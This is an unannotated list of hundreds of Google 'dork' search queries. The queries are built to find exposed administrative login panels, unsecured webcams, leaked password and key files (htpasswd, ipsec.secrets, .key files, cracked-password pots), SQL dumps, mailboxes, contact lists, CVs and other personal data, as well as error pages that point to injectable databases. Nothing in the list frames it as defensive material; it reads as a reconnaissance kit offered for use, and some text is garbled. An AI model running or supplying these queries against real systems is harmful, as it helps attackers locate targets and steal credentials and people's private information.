intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co 
intitle:"ColdFusion Administrator Login" 
intitle:"communigate pro * *" intitle:"entrance" 
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo 
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo 
intitle:"Dell Remote Access Controller" 
intitle:"Docutek ERes - Admin Login" -edu 
intitle:"Employee Intranet Login" 
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here." 
intitle:"ePowerSwitch Login" 
intitle:"eXist Database Administration" -demo 
intitle:"EXTRANET * - Identification" 
intitle:"EXTRANET login" -.edu -.mil -.gov 
intitle:"EZPartner" -netpond 
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists 
intitle:"i-secure v1.1" -edu 
intitle:"Icecast Administration Admin Page" 
intitle:"iDevAffiliate - admin" -demo 
intitle:"ISPMan : Unauthorized Access prohibited" 
intitle:"ITS System Information" "Please log on to the SAP System" 
intitle:"Kurant Corporation StoreSense" filetype:bok 
intitle:"ListMail Login" admin -demo 
intitle:"Login - 
Easy File Sharing Web Server" 
intitle:"Login Forum 
AnyBoard" intitle:"If you are a new user:" intext:"Forum 
AnyBoard" inurl:gochat -edu 
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman 
intitle:"Login to Cacti" 
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id= 
intitle:"MailMan Login" 
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi 
intitle:"Merak Mail Server Web Administration" -ihackstuff.com 
intitle:"microsoft certificate services" inurl:certsrv 
intitle:"MikroTik RouterOS Managing Webpage" 
intitle:"MX Control Console" "If you can't remember" 
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language." 
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch 
intitle:"OnLine Recruitment Program - Login" 
intitle:"Philex 0.2*" -s?ri?t -site:freelists.org 
intitle:"PHP Advanced Transfer" inurl:"login.php" 
intitle:"php icalendar administration" -site:sourceforge.net 
intitle:"php icalendar administration" -site:sourceforge.net 
intitle:"phpPgAdmin - Login" Language 
intitle:"PHProjekt - login" login password 
intitle:"please login" "your password is *" 
intitle:"Remote Desktop Web Connection" inurl:tsweb 
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test" 
intitle:"SHOUTcast Administrator" inurl:admin.cgi 
intitle:"site administration: please log in" "site designed by emarketsouth" 
intitle:"Supero Doctor III" -inurl:supermicro 
intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!" 
intitle:"teamspeak server-administration 
intitle:"Tomcat Server Administration" 
intitle:"TOPdesk ApplicationServer" 
intitle:"TUTOS Login" 
intitle:"TWIG Login" 
intitle:"vhost" intext:"vHost . 2000-2004" 
intitle:"Virtual Server Administration System" 
intitle:"VisNetic WebMail" inurl:"/mail/" 
intitle:"VitalQIP IP Management System" 
intitle:"VMware Management Interface:" inurl:"vmware/en/" 
intitle:"VNC viewer for Java" 
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org 
intitle:"WebLogic Server" intitle:"Console Login" inurl:console 
intitle:"Welcome Site/User Administrator" "Please select the language" -demos 
intitle:"Welcome to Mailtraq WebMail" 
intitle:"welcome to netware *" -site:novell.com 
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies." 
intitle:"xams 0.0.0..15 - Login" 
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin 
intitle:"XMail Web Administration Interface" intext:Login intext:password 
intitle:"Zope Help System" inurl:HelpSys 
intitle:"ZyXEL Prestige Router" "Enter password" 
intitle:"inc. vpn 3000 concentrator" 
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com 
intitle:asterisk.management.portal web-access 
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet 
intitle:Group-Office "Enter your username and password to login" 
intitle:ilohamail " 
IlohaMail" 
intitle:ilohamail intext:"Version 0.8.10" " 
IlohaMail" 
intitle:IMP inurl:imp/index.php3 
intitle:Login * Webmailer 
intitle:Login intext:"RT is ? Copyright" 
intitle:Node.List Win32.Version.3.11 
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc" 
intitle:open-xchange inurl:login.pl 
intitle:Ovislink inurl:private/login 
intitle:phpnews.login 
intitle:plesk inurl:login.php3 
inurl:"/admin/configuration. php?" Mystore 
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)" 
inurl:"1220/parse_xml.cgi?" 
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS) 
inurl:":10000" intext:webmin 
inurl:"Activex/default.htm" "Demo" 
inurl:"calendar.asp?action=login" 
inurl:"default/login.php" intitle:"kerio" 
inurl:"gs/adminlogin.aspx" 
inurl:"php121login.php" 
inurl:"suse/login.pl" 
inurl:"typo3/index.php?u=" -demo 
inurl:"usysinfo?login=true" 
inurl:"utilities/TreeView.asp" 
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp 

Code: 

nurl:/admin/login.asp 
inurl:/cgi-bin/sqwebmail?noframes=1 
inurl:/Citrix/Nfuse17/ 
inurl:/dana-na/auth/welcome.html 
inurl:/eprise/ 
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net 
inurl:/modcp/ intext:Moderator+vBulletin 
inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services" 
inurl:/webedit.* intext:WebEdit Professional -html 
inurl:1810 "Oracle Enterprise Manager" 
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com 
inurl::2082/frontend -demo 
inurl:administrator "welcome to mambo" 
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0 
inurl:cgi-bin/ultimatebb.cgi?ubb=login 
inurl:Citrix/MetaFrame/default/default.aspx 
inurl:confixx inurl:login|anmeldung 
inurl:coranto.cgi intitle:Login (Authorized Users Only) 
inurl:csCreatePro.cgi 
inurl:default.asp intitle:"WebCommander" 
inurl:exchweb/bin/auth/owalogon.asp 
inurl:gnatsweb.pl 
inurl:ids5web 
inurl:irc filetype:cgi cgi:irc 
inurl:login filetype:swf swf 
inurl:login.asp 
inurl:login.cfm 
inurl:login.php "SquirrelMail version" 
inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login" 
inurl:mewebmail 
inurl:names.nsf?opendatabase 
inurl:ocw_login_username 
inurl:orasso.wwsso_app_admin.ls_login 
inurl:postfixadmin intitle:"postfix admin" ext:php 
inurl:search/admin.php 
inurl:textpattern/index.php 
inurl:WCP_USER 
inurl:webmail./index.pl "Interface" 
inurl:webvpn.html "login" "Please enter your" 
Login (" 
Jetbox One CMS â?¢" | " 
Jetstream ? *") 
Novell NetWare intext:"netware management portal version" 
Outlook Web Access (a better way) 
PhotoPost PHP Upload 
PHPhotoalbum Statistics 
PHPhotoalbum Upload 
phpWebMail 
Please enter a valid password! inurl:polladmin 

INDEXU 
Ultima Online loginservers 
W-Nailer Upload Area 
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu 
"#mysql dump" filetype:sql 
"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3 
"allow_call_time_pass_reference" "PATH_INFO" 
"Certificate Practice Statement" inurl:(PDF | DOC) 
"Generated by phpSystem" 
"generated by wwwstat" 
"Host Vulnerability Summary Report" 
"HTTP_FROM=googlebot" googlebot.com "Server_Software=" 
"Index of" / "chat/logs" 
"Installed Objects Scanner" inurl:default.asp 
"MacHTTP" filetype:log inurl:machttp.log 
"Mecury Version" "Infastructure Group" 
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log 
"Most Submitted Forms and s?ri?ts" "this section" 
"Network Vulnerability Assessment Report" 
"not for distribution" confidential 
"not for public release" -.edu -.gov -.mil 
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae" 
"phpMyAdmin" "running on" inurl:"main.php" 
"produced by getstats" 
"Request Details" "Control Tree" "Server Variables" 
"robots.txt" "Disallow:" filetype:txt 
"Running in Child mode" 
"sets mode: +p" 
"sets mode: +s" 
"Thank you for your order" +receipt 
"This is a Shareaza Node" 
"This report was generated by WebLog" 
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject 
(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results") 
(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob 
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt 
+":8080" +":3128" +":80" filetype:txt 
+"HSTSNR" -"netop.com" 
-site:php.net -"The PHP Group" inurl:source inurl:url ext:pHp 
94FBR "ADOBE PHOTOSHOP" 
AIM buddy lists 
allinurl:/examples/jsp/snp/snoop.jsp 
allinurl:cdkey.txt 
allinurl:servlet/SnoopServlet 
cgiirc.conf 
cgiirc.conf 
contacts ext:wml 
data filetype:mdb -site:gov -site:mil 
exported email addresses 
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential 
ext:asp inurl:pathto.asp 
ext:ccm ccm -catacomb 
ext:CDX CDX 
ext:cgi inurl:editcgi.cgi inurl:file= 
ext:conf inurl:rsyncd.conf -cvs -man 
ext:conf NoCatAuth -cvs 
ext:dat bpk.dat 
ext:gho gho 
ext:ics ics 
ext:ini intext:env.ini 
ext:jbf jbf 
ext:ldif ldif 
ext:log "Software: Microsoft Internet Information Services *.*" 
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb 
ext:nsf nsf -gov -mil 
ext:plist filetype:plist inurl:bookmarks.plist 
ext:pqi pqi -database 
ext:reg "username=*" putty 
ext:txt "Final encryption key" 
ext:txt inurl:dxdiag 
ext:vmdk vmdk 
ext:vmx vmx 
filetype:asp DBQ=" * Server.MapPath("*.mdb") 
filetype:bkf bkf 
filetype:blt "buddylist" 
filetype:blt blt +intext:screenname 
filetype:cfg auto_inst.cfg 
filetype:cnf inurl:_vti_pvt access.cnf 
filetype:conf inurl:firewall -intitle:cvs 
filetype:config web.config -CVS 
filetype:ctt Contact 
filetype:ctt ctt messenger 
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To" 
filetype:fp3 fp3 
filetype:fp5 fp5 -site:gov -site:mil -"cvs log" 
filetype:fp7 fp7 
filetype:inf inurl:capolicy.inf 
filetype:lic lic intext:key 
filetype:log access.log -CVS 
filetype:log cron.log 
filetype:mbx mbx intext:Subject 
filetype:myd myd -CVS 
filetype:ns1 ns1 
filetype:ora ora 
filetype:ora tnsnames 
filetype:pdb pdb backup (Pilot | Pluckerdb) 
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net 
filetype:pot inurl:john.pot 
filetype:PS ps 
filetype:pst inurl:"outlook.pst" 
filetype:pst pst -from -to -date 
filetype:qbb qbb 
filetype:QBW qbw 
filetype:rdp rdp 
filetype:reg "Terminal Server Client" 
filetype:vcs vcs 
filetype:wab wab 
filetype:xls -site:gov inurl:contact 
filetype:xls inurl:"email.xls" 
Financial spreadsheets: finance.xls 
Financial spreadsheets: finances.xls 
Ganglia Cluster Reports 
haccess.ctl (one way) 
haccess.ctl (VERY reliable) 
ICQ chat logs, please... 
intext:"Session Start * * * *:*:* *" filetype:log 
intext:"Tobias Oetiker" "traffic analysis" 
intext:(password | passcode) intext:(username | userid | user) filetype:csv 
intext:gmail invite intext:http://gmail.google.com/gmail/a 
intext:SQLiteManager inurl:main.php 
intext:ViewCVS inurl:Settings.php 
intitle:"admin panel" +" 
RedKernel" 
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html) 
intitle:"AppServ Open Project" -site:www.appservnetwork.com 
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos" 
intitle:"Big Sister" +"OK Attention Trouble" 
intitle:"curriculum vitae" filetype:doc 
intitle:"edna:streaming mp3 server" -forums 
intitle:"FTP root at" 
intitle:"index of" +myd size 
intitle:"Index Of" -inurl:maillog maillog size 
intitle:"Index Of" cookies.txt size 
intitle:"index of" mysql.conf OR mysql_config 
intitle:"Index of" upload size parent directory 
intitle:"index.of *" admin news.asp configview.asp 
intitle:"index.of" .diz .nfo last modified 
intitle:"Joomla - Web Installer" 
intitle:"LOGREP - Log file reporting system" -site:itefix.no 
intitle:"Multimon UPS status page" 
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php ) 
intitle:"PhpMyExplorer" inurl:"index.php" -cvs 
intitle:"statistics of" "advanced web statistics" 
intitle:"System Statistics" +"System and Network Information Center" 
intitle:"urchin (5|3|admin)" ext:cgi 
intitle:"Usage Statistics for" "Generated by Webalizer" 
intitle:"wbem" compaq login "Compaq Information Technologies Group" 
intitle:"Web Server Statistics for ****" 
intitle:"web server status" SSH Telnet 
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page" 
intitle:"welcome.to.squeezebox" 
intitle:admin intitle:login 
intitle:Bookmarks inurl:bookmarks.html "Bookmarks 
intitle:index.of "Apache" "server at" 
intitle:index.of cleanup.log 
intitle:index.of dead.letter 
intitle:index.of inbox 
intitle:index.of inbox dbx 
intitle:index.of ws_ftp.ini 
intitle:intranet inurl:intranet +intext:"phone" 
inurl:"/axs/ax-admin.pl" -s?ri?t 
inurl:"/cricket/grapher.cgi" 
inurl:"bookmark.htm" 
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM 
inurl:"newsletter/admin/" 
inurl:"newsletter/admin/" intitle:"newsletter admin" 
inurl:"putty.reg" 
inurl:"smb.conf" intext:"workgroup" filetype:conf conf 
inurl:*db filetype:mdb 
inurl:/cgi-bin/pass.txt 
inurl:/_layouts/settings 
inurl:admin filetype:xls 
inurl:admin intitle:login 
inurl:backup filetype:mdb 
inurl:build.err 
inurl:cgi-bin/printenv 
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI" 
inurl:changepassword.asp 
inurl:ds.py 
inurl:email filetype:mdb 
inurl:fcgi-bin/echo 
inurl:forum filetype:mdb 
inurl:forward filetype:forward -cvs 
inurl:getmsg.html intitle:hotmail 
inurl:log.nsf -gov 
inurl:main.php phpMyAdmin 
inurl:main.php Welcome to phpMyAdmin 
inurl:netscape.hst 
inurl:netscape.hst 
inurl:netscape.ini 
inurl:odbc.ini ext:ini -cvs 
inurl:perl/printenv 
inurl:php.ini filetype:ini 
inurl:preferences.ini "[emule]" 
inurl:profiles filetype:mdb 
inurl:report "EVEREST Home Edition " 
inurl:server-info "Apache Server Information" 
inurl:server-status "apache" 
inurl:snitz_forums_2000.mdb 
inurl:ssl.conf filetype:conf 
inurl:tdbin 
inurl:vbstats.php "page generated" 
inurl:wp-mail.php + "There doesn't seem to be any new mail." 
inurl:XcCDONTS.asp 
ipsec.conf 
ipsec.secrets 
ipsec.secrets 
Lotus Domino address books 
mail filetype:csv -site:gov intext:name 
Microsoft Money Data Files 
mt-db-pass.cgi files 
MySQL tabledata dumps 
mystuff.xml - Trillian data files 
OWA Public Folders (direct view) 
Peoples MSN contact lists 
php-addressbook "This is the addressbook for *" -warning 
phpinfo() 
phpMyAdmin dumps 
phpMyAdmin dumps 
private key files (.csr) 
private key files (.key) 
Quicken data files 
rdbqds -site:.edu -site:.mil -site:.gov 
robots.txt 
site:edu admin grades 
site:www.mailinator.com inurl:ShowMail.do 
SQL data dumps 
Squid cache server reports 
Unreal IRCd 
WebLog Referrers 
Welcome to ntop! 
Fichier contenant des informations sur le r?seau : 
filetype:log intext:"ConnectionManager2" 
"apricot - admin" 00h 
"by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta" 
"Network Host Assessment Report" "Internet Scanner" 
"Output produced by SysWatch *" 
"Phorum Admin" "Database Connection" inurl:forum inurl:admin 
phpOpenTracker" Statistics 
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example 
"Shadow Security Scanner performed a vulnerability assessment" 
"SnortSnarf alert page" 
"The following report contains confidential information" vulnerability -search 
"The statistics were last upd?t?d" "Daily"-microsoft.com 
"this proxy is working fine!" "enter *" "URL***" * visit 
"This report lists" "identified by Internet Scanner" 
"Traffic Analysis for" "RMON Port * on unit *" 
"Version Info" "Boot Version" "Internet Settings" 
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph")) 
Analysis Console for Incident Databases 
ext:cfg radius.cfg 
ext:cgi intext:"nrg-" " This web page was created on " 
filetype:pdf "Assessment Report" nessus 
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System" 
filetype:php inurl:nqt intext:"Network Query Tool" 
filetype:vsd vsd network -samples -examples 
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm 
intitle:"ADSL Configuration page" 
intitle:"Azureus : Java BitTorrent Client Tracker" 
intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies." 
intitle:"BNBT Tracker Info" 
intitle:"Microsoft Site Server Analysis" 
intitle:"Nessus Scan Report" "This file was generated by Nessus" 
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics" 
intitle:"Retina Report" "CONFIDENTIAL INFORMATION" 
intitle:"start.managing.the.device" remote pbx acc 
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers." 
intitle:"twiki" inurl:"TWikiUsers" 
inurl:"/catalog.nsf" intitle:catalog 
inurl:"install/install.php" 
inurl:"map.asp?" intitle:"WhatsUp Gold" 
inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc" 
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo 
inurl:/adm-cfgedit.php 
inurl:/cgi-bin/finger? "In real life" 
inurl:/cgi-bin/finger? Enter (account|host|user|username) 
inurl:/counter/index.php intitle:"+PHPCounter 7.*" 
inurl:CrazyWWWBoard.cgi intext:"detailed debugging information" 
inurl:login.jsp.bak 
inurl:ovcgi/jovw 
inurl:phpSysInfo/ "created by phpsysinfo" 
inurl:portscan.php "from Port"|"Port Range" 
inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl 
inurl:statrep.nsf -gov 
inurl:status.cgi?host=all 
inurl:testcgi xitami 
inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin 
inurl:webutil.pl 
Looking Glass 
site:netcraft.com intitle:That.Site.Running Apache 
"A syntax error has occurred" filetype:ihtml 
"access denied for user" "using password" 
"An illegal character has been found in the statement" -"previous message" 
"ASP.NET_SessionId" "data source=" 
"Can't connect to local" intitle:warning 
"Chatologica MetaSearch" "stack tracking" 
"detected an internal error [IBM][CLI Driver][DB2/6000]" 
"error found handling the request" cocoon filetype:xml 
"Fatal error: Call to undefined function" -reply -the -next 
"Incorrect syntax near" 
"Incorrect syntax near" 
"Internal Server Error" "server at" 
"Invision Power Board Database Error" 
"ORA-00933: SQL command not properly ended" 
"ORA-12541: TNS:no listener" intitle:"error occurred" 
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php 
"PostgreSQL query failed: ERROR: parser: parse error" 
"Supplied argument is not a valid MySQL result resource" 
"Syntax error in query expression " -the 
"The s?ri?t whose uid is " "is not allowed to access" 
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser." 
"Unable to jump to row" "on MySQL result index" "on line" 
"Unclosed quotation mark before the character string" 
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum 
"Warning: Cannot modify header information - headers already sent" 
"Warning: Division by zero in" "on line" -forum 

"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum 
"Warning: mysql_query()" "invalid query" 
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL" 
"Warning: Supplied argument is not a valid File-Handle resource in" 
"Warning:" "failed to open stream: HTTP request failed" "on line" 
"Warning:" "SAFE MODE Restriction in effect." "The s?ri?t whose uid is" "is not allowed to access owned by uid 0 in" "on line" 
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near" 
An unexpected token "END-OF-STATEMENT" was found 
Coldfusion Error Pages 
filetype:asp + "[ODBC SQL" 
filetype:asp "Custom Error Message" Category Source 
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error" 
filetype:php inurl:"logging.php" "Discuz" error 
ht://Dig htsearch error 
IIS 4.0 error messages 
IIS web server error messages 
Internal Server Error 
intext:"Error Message : Error loading required libraries." 
intext:"Warning: Failed opening" "on line" "include_path" 
intitle:"Apache Tomcat" "Error Report" 
intitle:"Default PLESK Page" 
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm 
intitle:"Error Occurred" "The error occurred in" filetype:cfm 
intitle:"Error using Hypernews" "Server Software" 
intitle:"Execution of this s?ri?t not permitted" 
intitle:"Under construction" "does not currently have" 
intitle:Configuration.File inurl:softcart.exe 
MYSQL error message: supplied argument.... 
mysql error with query 
Netscape Application Server Error page 
ORA-00921: unexpected end of SQL command 
ORA-00921: unexpected end of SQL command 
ORA-00936: missing expression 
PHP application warnings failing "include_path" 
sitebuildercontent 
sitebuilderfiles 
sitebuilderpictures 
Snitz! forums db path error 
SQL syntax error 
Supplied argument is not a valid PostgreSQL result 
warning "error on line" php sablotron 
Windows 2000 web server error messages 
"ftp://" "www.eastgame.net" 
"html allowed" guestbook 
: vBulletin Version 1.1.5" 
"Select a database to view" intitle:"filemaker pro" 
"set up the administrator user" inurl:pivot 
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row 
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin 
"Welcome to Intranet" 
"Welcome to PHP-Nuke" congratulations 
"Welcome to the Prestige Web-Based Configurator" 
"YaBB SE Dev Team" 
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos 
("Indexed.By"|"Monitored.By") hAcxFtpScan 
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=) 
allinurl:"index.php" "site=sglinks" 
allinurl:install/install.php 
allinurl:intranet admin 
filetype:cgi inurl:"fileman.cgi" 
filetype:cgi inurl:"Web_Store.cgi" 
filetype:php inurl:vAuthenticate 
filetype:pl intitle:"Ultraboard Setup" 
Gallery in configuration mode 
Hassan Consulting's Shopping Cart Version 1.18 
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" - 
intitle:"Gateway Configuration Menu" 
intitle:"Horde :: My Portal" -"[Tickets" 
intitle:"Mail Server CMailServer Webmail" "5.2" 
intitle:"MvBlog powered" 
intitle:"Remote Desktop Web Connection" 
intitle:"Samba Web Administration Tool" intext:"Help Workgroup" 
intitle:"Terminal Services Web Connection" 
intitle:"Uploader - Uploader v6" -pixloads.com 
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com 
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" 
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*" 
inurl:"/NSearch/AdminServlet" 
inurl:"index.php? module=ew_filemanager" 
inurl:aol*/_do/rss_popup?blogID= 
inurl:footer.inc.php 
inurl:info.inc.php 
inurl:ManyServers.htm 
inurl:newsdesk.cgi? inurl:"t=" 
inurl:pls/admin_/gateway.htm 
inurl:rpSys.html 
inurl:search.php vbulletin 
inurl:servlet/webacc 
natterchat inurl:home.asp -site:natterchat.co.uk 
XOOPS Custom Installation 
inurl:htpasswd filetype:htpasswd 
inurl:yapboz_detay.asp + View Webcam User Accessing 
allinurl:control/multiview 
inurl:"ViewerFrame?Mode=" 
intitle:"WJ-NT104 Main Page" 
inurl:netw_tcp.shtml 
intitle:"supervisioncam protocol"